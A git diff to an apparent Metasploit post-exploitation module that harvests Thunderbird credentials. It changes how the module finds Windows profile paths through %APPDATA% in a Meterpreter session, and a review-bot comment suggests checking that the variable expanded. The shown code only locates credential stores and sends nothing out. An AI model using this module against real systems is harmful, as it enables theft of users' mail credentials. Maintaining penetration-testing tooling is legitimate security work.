diff --git a/modules/post/multi/gather/thunderbird_creds.rb b/modules/post/multi/gather/thunderbird_creds.rb
index 1810c966f3..e700ceb4b5 100644
--- a/modules/post/multi/gather/thunderbird_creds.rb
+++ b/modules/post/multi/gather/thunderbird_creds.rb
@@ -56,18 +56,11 @@ class Metasploit3 < Msf::Post
 base = "/Users/#{user}/Library/Thunderbird/Profiles/"
 when /win/
 if session.type =~ /meterpreter/
- user_profile = session.fs.file.expand_path("%USERPROFILE%")
+ user_profile = session.fs.file.expand_path("%APPDATA%")
 else
- user_profile = cmd_exec("echo %USERPROFILE%").strip
- end
-
- if user_profile =~ /^C:\\Users\\/
- # Windows Vista or newer
- base = user_profile + '\\AppData\\Roaming\\Thunderbird\\Profiles\\'
- else
- # Windows XP
- base = user_profile + '\\Application Data\\Thunderbird\\Profiles\\'
+ user_profile = cmd_exec("echo %APPDATA%").strip
 end
+ base = user_profile + "\\Thunderbird\\Profiles\\"
 end
 # Now we have the path for Thunderbird, we still need to enumerate its
@@ -252,4 +245,4 @@ to load the lib). Not to mention you need to borrow several more Mozilla compon
 do the decryption. BDB gem unfortunately is kind of busted during my testing, so I guess we can pretty much forget about doing the decryption locally... chances are a lot of users would have problems just to get that setup going anyway.
-=end
\ No newline at end of file
+=end
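Review bot: The new `base = user_profile + "\\Thunderbird\\Profiles\\"` line in the first hunk uses whatever the %APPDATA% lookup returned without checking that the variable actually expanded. When the variable is not set for the account the session runs as, `cmd_exec("echo %APPDATA%")` hands back the literal `%APPDATA%`, and the Meterpreter `expand_path` result may be empty or nil (not verifiable from this hunk), so the profile enumeration further down would run against a bogus path and fail with a misleading message. I would rename the local to `appdata`, since it no longer holds the user profile directory, and stop early with something like `return print_error("Unable to resolve %APPDATA%") if appdata.to_s.empty? || appdata.include?('%')` before building `base`. The enclosing method starts and ends outside the hunk, so the right form of early exit depends on code not shown here.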